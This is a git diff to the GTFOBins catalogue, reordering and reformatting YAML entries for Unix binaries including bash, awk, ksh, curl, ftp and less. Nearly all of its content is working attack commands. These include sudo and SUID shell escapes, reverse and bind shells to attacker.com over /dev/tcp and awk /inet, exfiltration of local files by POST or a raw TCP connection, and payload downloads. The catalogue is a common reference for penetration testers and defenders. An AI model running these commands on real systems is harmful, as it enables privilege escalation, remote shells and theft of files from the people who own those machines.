diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index eb597b6..0656272 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- - code: ash
- sudo-enabled:
- - code: sudo ash
- suid-enabled:
- - code: ./ash
+ - code: ash
file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./ash"
+ sudo-enabled:
+ - code: sudo ash
---
diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md
index 6782a72..90da062 100644
--- a/_gtfobins/awk.md
+++ b/_gtfobins/awk.md
@@ -1,34 +1,34 @@
---
functions:
execute-interactive:
- - code: awk 'BEGIN {system("/bin/sh")}'
- sudo-enabled:
- - code: sudo awk 'BEGIN {system("/bin/sh")}'
- suid-limited:
- - code: ./awk 'BEGIN {system("/bin/sh")}'
+ - code: awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
- s = "/inet/tcp/0/" RHOST "/" RPORT;
- while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
- while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
+ s = "/inet/tcp/0/" RHOST "/" RPORT;
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- awk -v LPORT=$LPORT 'BEGIN {
- s = "/inet/tcp/" LPORT "/0/0";
- while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
- while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
- file-read:
- - code: |
- LFILE=file_to_read
- awk '//' "$LFILE"
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ awk -v LPORT=$LPORT 'BEGIN {
+ s = "/inet/tcp/" LPORT "/0/0";
+ while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
+ while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
file-write:
- - code: |
- LFILE=file_to_write
- awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ - code: |
+ LFILE=file_to_write
+ awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ awk '//' "$LFILE"
+ sudo-enabled:
+ - code: sudo awk 'BEGIN {system("/bin/sh")}'
+ suid-limited:
+ - code: ./awk 'BEGIN {system("/bin/sh")}'
---
diff --git a/_gtfobins/base64.md b/_gtfobins/base64.md
index 2dd7844..76f8551 100644
--- a/_gtfobins/base64.md
+++ b/_gtfobins/base64.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo base64 "$LFILE" | base64 --decode
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./base64 "$LFILE" | base64 --decode
file-read:
- - code: |
- LFILE=file_to_read
- base64 "$LFILE" | base64 --decode
+ - code: |
+ LFILE=file_to_read
+ base64 "$LFILE" | base64 --decode
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./base64 "$LFILE" | base64 --decode
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo base64 "$LFILE" | base64 --decode
---
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 0b67c26..5665958 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -1,52 +1,55 @@
---
functions:
execute-interactive:
- - code: bash
- sudo-enabled:
- - code: sudo bash
- suid-enabled:
- - code: ./bash -p
- upload:
- - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
- 3<>/dev/tcp/$RHOST/$RPORT \
- | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
+ - code: bash
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
- file-read:
- - description: It trims trailing newlines and it's not binary-safe.
- code: |
- export LFILE=file_to_read
- bash -c 'echo "$(<$LFILE)"'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
+ upload:
+ - description: Send local file in the body of an HTTP POST request. Run an HTTP
+ service on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ bash -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+ 3<>/dev/tcp/$RHOST/$RPORT \
+ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
+ - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+ on the attacker box to send the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write:
- - code: |
- export LFILE=file_to_write
- bash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ bash -c 'echo data > $LFILE'
+ file-read:
+ - description: It trims trailing newlines and it's not binary-safe.
+ code: |
+ export LFILE=file_to_read
+ bash -c 'echo "$(<$LFILE)"'
+ suid-enabled:
+ - code: "./bash -p"
+ sudo-enabled:
+ - code: sudo bash
---
diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md
index c1eac8f..7e387bb 100644
--- a/_gtfobins/busybox.md
+++ b/_gtfobins/busybox.md
@@ -4,23 +4,24 @@ description: |
what GTFBins binaries are supported. Here some example.
functions:
execute-interactive:
- - code: busybox sh
- sudo-enabled:
- - code: sudo busybox sh
- suid-enabled:
- - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
- code: ./busybox sh
- file-read:
- - code: |
- LFILE=file_to_read
- ./busybox cat "$LFILE"
- file-write:
- - code: |
- LFILE=file_to_write
- busybox sh -c 'echo "data" > $LFILE'
+ - code: busybox sh
upload:
- - description: Serve files in the local folder running an HTTP server.
- code: |
- export LPORT=12345
- busybox httpd -f -p $LPORT -h .
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=12345
+ busybox httpd -f -p $LPORT -h .
+ file-write:
+ - code: |
+ LFILE=file_to_write
+ busybox sh -c 'echo "data" > $LFILE'
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ ./busybox cat "$LFILE"
+ suid-enabled:
+ - description: It may drop the SUID privileges depending on the compilation flags
+ and the runtime configuration.
+ code: "./busybox sh"
+ sudo-enabled:
+ - code: sudo busybox sh
---
diff --git a/_gtfobins/cat.md b/_gtfobins/cat.md
index da1e242..0278a57 100644
--- a/_gtfobins/cat.md
+++ b/_gtfobins/cat.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo cat "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./cat "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- cat "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ cat "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./cat "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo cat "$LFILE"
---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index aa5b1e3..e37cb53 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- - code: csh
- sudo-enabled:
- - code: sudo csh
- suid-enabled:
- - code: ./csh -b
+ - code: csh
file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./csh -b"
+ sudo-enabled:
+ - code: sudo csh
---
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index c14cc1b..3ad8be7 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -1,20 +1,21 @@
---
functions:
upload:
- - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- URL=http://attacker.com/
- LFILE=file_to_send
- curl -X POST -d @$file_to_send $URL
+ - description: Send local file with an HTTP POST request. Run an HTTP service on
+ the attacker box to collect the file.
+ code: |
+ URL=http://attacker.com/
+ LFILE=file_to_send
+ curl -X POST -d @$file_to_send $URL
download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- URL=http://attacker.com/file_to_get
- LFILE=file_to_save
- curl $URL -o $LFILE
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ URL=http://attacker.com/file_to_get
+ LFILE=file_to_save
+ curl $URL -o $LFILE
file-read:
- - description: The file path must be absolute.
- code: |
- LFILE=/tmp/file_to_read
- curl file://$LFILE
+ - description: The file path must be absolute.
+ code: |
+ LFILE=/tmp/file_to_read
+ curl file://$LFILE
---
diff --git a/_gtfobins/cut.md b/_gtfobins/cut.md
index ec0bce8..8c255b9 100644
--- a/_gtfobins/cut.md
+++ b/_gtfobins/cut.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo cut -d "" -f1 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./cut -d "" -f1 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- cut -d "" -f1 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ cut -d "" -f1 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./cut -d "" -f1 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo cut -d "" -f1 "$LFILE"
---
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 0e61b02..724a3dc 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -1,13 +1,13 @@
---
functions:
execute-interactive:
- - code: dash
- sudo-enabled:
- - code: sudo dash
- suid-enabled:
- - code: ./dash -p
+ - code: dash
file-write:
- - code: |
- export LFILE=file_to_write
- ash -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ash -c 'echo data > $LFILE'
+ suid-enabled:
+ - code: "./dash -p"
+ sudo-enabled:
+ - code: sudo dash
---
diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md
index a34f5b7..4c8eb8d 100644
--- a/_gtfobins/dd.md
+++ b/_gtfobins/dd.md
@@ -1,11 +1,11 @@
---
functions:
- file-read:
- - code: |
- LFILE=file_to_read
- dd if=LFILE
file-write:
- - code: |
- LFILE=file_to_write
- echo "data" | dd of=$LFILE
+ - code: |
+ LFILE=file_to_write
+ echo "data" | dd of=$LFILE
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ dd if=LFILE
---
diff --git a/_gtfobins/diff.md b/_gtfobins/diff.md
index 77ad8b6..0fc0308 100644
--- a/_gtfobins/diff.md
+++ b/_gtfobins/diff.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo diff --line-format=%L /dev/null $LFILE
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./diff --line-format=%L /dev/null $LFILE
file-read:
- - code: |
- LFILE=file_to_read
- diff --line-format=%L /dev/null $LFILE
+ - code: |
+ LFILE=file_to_read
+ diff --line-format=%L /dev/null $LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./diff --line-format=%L /dev/null $LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo diff --line-format=%L /dev/null $LFILE
---
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index 2d9dc16..9683b83 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -1,22 +1,23 @@
---
functions:
execute-interactive:
- - code: |
- ed
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo ed
- !/bin/sh
- suid-limited:
- - code: |
- ./ed
- !/bin/sh
- file-read:
- - code: |
- ed file_to_read
+ - code: |
+ ed
+ !/bin/sh
file-write:
- - code: |
- ed file_to_write
- w
+ - code: |
+ ed file_to_write
+ w
+ file-read:
+ - code: 'ed file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo ed
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./ed
+ !/bin/sh
---
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 7750506..d758d40 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -1,16 +1,17 @@
---
functions:
execute-interactive:
- - code: emacs -Q -nw --eval '(term "/bin/sh")'
- sudo-enabled:
- - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
- suid-enabled:
- - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
- file-read:
- - code: |
- emacs file_to_read
+ - code: emacs -Q -nw --eval '(term "/bin/sh")'
file-write:
- - code: |
- emacs file_to_write
- C-x C-s
+ - code: |
+ emacs file_to_write
+ C-x C-s
+ file-read:
+ - code: 'emacs file_to_read
+
+'
+ suid-enabled:
+ - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
---
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index e0b5368..71b1e78 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: env /bin/sh
- sudo-enabled:
- - code: sudo env /bin/sh
+ - code: env /bin/sh
suid-enabled:
- - code: ./env /bin/sh -p
+ - code: "./env /bin/sh -p"
+ sudo-enabled:
+ - code: sudo env /bin/sh
---
diff --git a/_gtfobins/expand.md b/_gtfobins/expand.md
index a13ca84..8ff7fbd 100644
--- a/_gtfobins/expand.md
+++ b/_gtfobins/expand.md
@@ -1,17 +1,18 @@
---
-description: |
- The read file content is corrupted by replacing tabs with spaces.
+description: 'The read file content is corrupted by replacing tabs with spaces.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo expand "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./expand "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- expand "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ expand "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./expand "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo expand "$LFILE"
---
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index 421084a..3e9602b 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: expect -c 'spawn /bin/sh;interact'
- sudo-enabled:
- - code: sudo expect -c 'spawn /bin/sh;interact'
+ - code: expect -c 'spawn /bin/sh;interact'
suid-enabled:
- - code: ./expect -c 'spawn /bin/sh -p;interact'
+ - code: "./expect -c 'spawn /bin/sh -p;interact'"
+ sudo-enabled:
+ - code: sudo expect -c 'spawn /bin/sh;interact'
---
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index 2305f6b..fc1386a 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: find . -exec /bin/sh \; -quit
- sudo-enabled:
- - code: sudo find . -exec /bin/sh \; -quit
+ - code: find . -exec /bin/sh \; -quit
suid-enabled:
- - code: ./find . -exec /bin/sh -p \; -quit
+ - code: "./find . -exec /bin/sh -p \\; -quit"
+ sudo-enabled:
+ - code: sudo find . -exec /bin/sh \; -quit
---
diff --git a/_gtfobins/flock.md b/_gtfobins/flock.md
index da940ed..28a0ec3 100644
--- a/_gtfobins/flock.md
+++ b/_gtfobins/flock.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: flock -u / /bin/sh
- sudo-enabled:
- - code: sudo flock -u / /bin/sh
+ - code: flock -u / /bin/sh
suid-enabled:
- - code: ./flock -u / /bin/sh -p
+ - code: "./flock -u / /bin/sh -p"
+ sudo-enabled:
+ - code: sudo flock -u / /bin/sh
---
diff --git a/_gtfobins/fmt.md b/_gtfobins/fmt.md
index 028e561..79b69ac 100644
--- a/_gtfobins/fmt.md
+++ b/_gtfobins/fmt.md
@@ -1,17 +1,18 @@
---
-description: |
- The read file content is not binary-safe.
+description: 'The read file content is not binary-safe.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./fmt -pNON_EXISTING_PREFIX "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- fmt -pNON_EXISTING_PREFIX "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ fmt -pNON_EXISTING_PREFIX "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./fmt -pNON_EXISTING_PREFIX "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
---
diff --git a/_gtfobins/fold.md b/_gtfobins/fold.md
index 275b96c..cf98e21 100644
--- a/_gtfobins/fold.md
+++ b/_gtfobins/fold.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo fold -w99999999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./fold -w99999999 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- fold -w99999999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ fold -w99999999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./fold -w99999999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo fold -w99999999 "$LFILE"
---
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index c8647d6..c80f99a 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -1,23 +1,23 @@
---
functions:
execute-interactive:
- - code: |
- ftp
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo ftp
- !/bin/sh
+ - code: |
+ ftp
+ !/bin/sh
upload:
- - description: Send local file to a FTP server.
- code: |
- RHOST=attacker.com
- ftp $RHOST
- put file_to_send
+ - description: Send local file to a FTP server.
+ code: |
+ RHOST=attacker.com
+ ftp $RHOST
+ put file_to_send
download:
- - description: Fetch a remote file from a FTP server.
- code: |
- RHOST=attacker.com
- ftp $RHOST
- get file_to_get
+ - description: Fetch a remote file from a FTP server.
+ code: |
+ RHOST=attacker.com
+ ftp $RHOST
+ get file_to_get
+ sudo-enabled:
+ - code: |
+ sudo ftp
+ !/bin/sh
---
diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md
index d8f60b9..413739b 100644
--- a/_gtfobins/gdb.md
+++ b/_gtfobins/gdb.md
@@ -7,11 +7,11 @@ description: |
[version 3](/gtfobins/python3/).
functions:
execute-interactive:
- - code: gdb -nx -ex '!sh' -ex quit
- sudo-enabled:
- - code: sudo gdb -nx -ex '!sh' -ex quit
+ - code: gdb -nx -ex '!sh' -ex quit
file-write:
- - code: |
- LFILE=file_to_write
- gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ - code: |
+ LFILE=file_to_write
+ gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
+ sudo-enabled:
+ - code: sudo gdb -nx -ex '!sh' -ex quit
---
diff --git a/_gtfobins/head.md b/_gtfobins/head.md
index e124d68..00a98a5 100644
--- a/_gtfobins/head.md
+++ b/_gtfobins/head.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo head -c1G "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./head -c1G "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- head -c1G "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ head -c1G "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./head -c1G "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo head -c1G "$LFILE"
---
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index 6866485..4582300 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: ionice /bin/sh
- sudo-enabled:
- - code: sudo ionice /bin/sh
+ - code: ionice /bin/sh
suid-enabled:
- - code: ./ionice /bin/sh -p
+ - code: "./ionice /bin/sh -p"
+ sudo-enabled:
+ - code: sudo ionice /bin/sh
---
diff --git a/_gtfobins/jq.md b/_gtfobins/jq.md
index cc22b9c..c894c84 100644
--- a/_gtfobins/jq.md
+++ b/_gtfobins/jq.md
@@ -1,15 +1,15 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo jq -Rr . "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./jq -Rr . "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- jq -Rr . "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ jq -Rr . "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./jq -Rr . "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo jq -Rr . "$LFILE"
---
diff --git a/_gtfobins/ksh.md b/_gtfobins/ksh.md
index 7386e3f..1ebc62f 100644
--- a/_gtfobins/ksh.md
+++ b/_gtfobins/ksh.md
@@ -1,56 +1,59 @@
---
functions:
execute-interactive:
- - code: ksh
- sudo-enabled:
- - code: sudo ksh
- suid-enabled:
- - code: ./ksh -p
- upload:
- - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_send
- ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
- 3<>/dev/tcp/$RHOST/$RPORT \
- | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export LFILE=file_to_get
- ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
+ - code: ksh
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
- file-read:
- - description: It trims trailing newlines.
- code: |
- export LFILE=file_to_read
- ksh -c 'echo "$(<$LFILE)"'
- - description: It trims trailing newlines.
- code: |
- export LFILE=file_to_read
- ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
+ upload:
+ - description: Send local file in the body of an HTTP POST request. Run an HTTP
+ service on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
+ - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_send
+ ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
+ 3<>/dev/tcp/$RHOST/$RPORT \
+ | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
+ - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
+ on the attacker box to send the file.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export LFILE=file_to_get
+ ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
file-write:
- - code: |
- export LFILE=file_to_write
- ksh -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ksh -c 'echo data > $LFILE'
+ file-read:
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ ksh -c 'echo "$(<$LFILE)"'
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
+ suid-enabled:
+ - code: "./ksh -p"
+ sudo-enabled:
+ - code: sudo ksh
---
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md
index b908a97..081ec5a 100644
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@@ -9,9 +9,9 @@ description: |
```
functions:
execute-interactive:
- - code: /lib/ld.so /bin/sh
- sudo-enabled:
- - code: sudo /lib/ld.so /bin/sh
+ - code: "/lib/ld.so /bin/sh"
suid-enabled:
- - code: ./ld.so /bin/sh -p
+ - code: "./ld.so /bin/sh -p"
+ sudo-enabled:
+ - code: sudo /lib/ld.so /bin/sh
---
diff --git a/_gtfobins/less.md b/_gtfobins/less.md
index f8b34ce..d6d9044 100644
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -1,21 +1,22 @@
---
functions:
execute-interactive:
- - code: |
- less /etc/profile
- !/bin/sh
- - code: |
- VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
- v
- sudo-enabled:
- - code: |
- sudo less /etc/profile
- !/bin/sh
- suid-limited:
- - code: |
- ./less /etc/profile
- !/bin/sh
+ - code: |
+ less /etc/profile
+ !/bin/sh
+ - code: |
+ VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
+ v
file-read:
- - code: |
- less file_to_read
+ - code: 'less file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo less /etc/profile
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./less /etc/profile
+ !/bin/sh
---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
index f7b420b..b962133 100644
--- a/_gtfobins/ltrace.md
+++ b/_gtfobins/ltrace.md
@@ -1,7 +1,7 @@
---
functions:
execute-interactive:
- - code: ltrace -b -L /bin/sh
+ - code: ltrace -b -L /bin/sh
sudo-enabled:
- - code: sudo ltrace -b -L /bin/sh
+ - code: sudo ltrace -b -L /bin/sh
---
